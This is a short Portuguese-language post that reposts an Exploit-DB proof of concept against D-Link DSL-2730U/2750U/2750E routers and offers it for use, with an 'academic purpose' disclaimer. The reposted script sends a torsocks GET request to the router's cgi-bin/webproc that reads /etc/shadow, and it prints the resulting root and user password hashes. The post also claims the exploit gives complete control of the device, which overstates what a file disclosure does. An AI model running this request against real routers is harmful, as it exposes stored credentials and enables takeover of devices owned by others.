Aqui vai um exploit bem interessante para ataques em equipamentos do fabricante D-Link, em especial para o D-Link ADSL Router DSL-2730U / 2750U / 2750E, lembrando que este conteúdo tem fundamento acadêmico e não deve ser utilizado para fins ilÃcitos. (use por sua conta e risco). Este exploit permite (quando bem utilizado), a toma da de controle de um equipamento D-Link. Isso significa que o atacante consegue acesso completo ao equipamento ignorando senhas e diretrizes de segurança.
A matéria originariamente foi veiculada pelo Link: https://www.exploit-db.com/exploits/40735/
#!/bin/sh# # D-Link ADSL ROUTER DSL-2730U IN_1.02# Remote File Disclosure## Modem Name: DSL-2730U/DSL-2750E# Time and Date: 2012-05-23 09:51:16# HardwareVersion: U1# Firmware Version: IN_1.02/SEA_1.04/SEA_1.07# # Copyright 2016 (c) Todor Donev # <todor.donev at gmail.com># https://www.ethical-hacker.org/# https://www.facebook.com/ethicalhackerorg## Disclaimer:# This or previous programs is for Educational # purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the # fact that Todor Donev is not liable for any # damages caused by direct or indirect use of the # information or functionality provided by these # programs. The author or any Internet provider # bears NO responsibility for content or misuse # of these programs or any derivatives thereof.# By using these programs you accept the fact # that any damage (dataloss, system crash, # system compromise, etc.) caused by the use # of these programs is not Todor Donev's # responsibility.# # Use them at your own risk!## Thanks to Maya Hristova that support me. [todor@adamantium ~]$ torsocks GET "http://TARGET:PORT/cgi-bin/webproc?getpage=/etc/shadow&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=wizard"# #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::# root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::# #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::